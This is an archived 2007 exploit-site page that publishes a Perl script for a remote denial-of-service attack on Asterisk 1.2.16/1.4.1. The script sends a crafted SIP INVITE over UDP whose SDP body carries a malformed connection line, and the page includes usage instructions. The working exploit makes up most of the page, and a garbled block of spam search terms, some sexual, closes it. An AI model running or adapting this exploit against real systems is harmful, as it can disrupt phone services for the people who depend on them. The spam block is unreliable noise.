about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit



2007-03-25 Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit 
Rated as : Critical

#!/usr/bin/perl
# perl  asterisk-Invite.pl 192.168.1.104 5060 userX  192.168.1.2 5060
userY

use IO::Socket::INET;

die "Usage $0 <dst> <dport> <dusername> <src>
<sport> <susername>" unless ($ARGV[5]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);


$msg="INVITE sip:$ARGV[2]\@$ARGV[0]:$ARGV[1] SIP/2.0\r\nVia:
SIP/2.0/UDP $ARGV[3]:$ARGV[4];branch=01;rport\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]:$ARGV[1]>\r\nFrom: 
<sip:$ARGV[3]:$ARGV[4]>;tag=01\r\nCall-ID:
01\@$ARGV[3]\r\nContent-Type: application/sdp\r\nCSeq: 01
INVITE\r\nContent-Length: 187\r\n\r\nv=0\r\no=root 25903 25903 IN IP4
$ARGV[3]\r\ns=session\r\nc=IN IP4 $ARGV[3]\r\nc=IN IP4 910.188.8.2\r\nt=0
0\r\nm=audio 13956 RTP/AVP 0 4 3 8 111 5 10 7 18 110 97 101\r\na=rtpmap:98
speex/16000\r\n\r\n";

$socket->send($msg);
securitydot.net - 2007-03-25

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 04:38:21 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Free mp3 for ...n P timelsex PHP-Fusion xayf.com.c 9089 www.12cr1m php-nuke 2 WWW.Indins thamil sex iLo %253FsIncP saxy x nansyajram forum free sxe ahmad Linux 2.4. perl Adle 200 /compo guest+book P.../spamx xzero Banglorese dreamaquar P.../spamx news+for+C maxcpm.inf news for c 1und1 expl www.shsch. Sexfamme VWar.html/ remote exp www.47802. hinh anh d www.squido sex moms www.gouwzn DI524 indianidol www.youpor www.taobzn mambo expl news for c srdf www.sexinp Free porn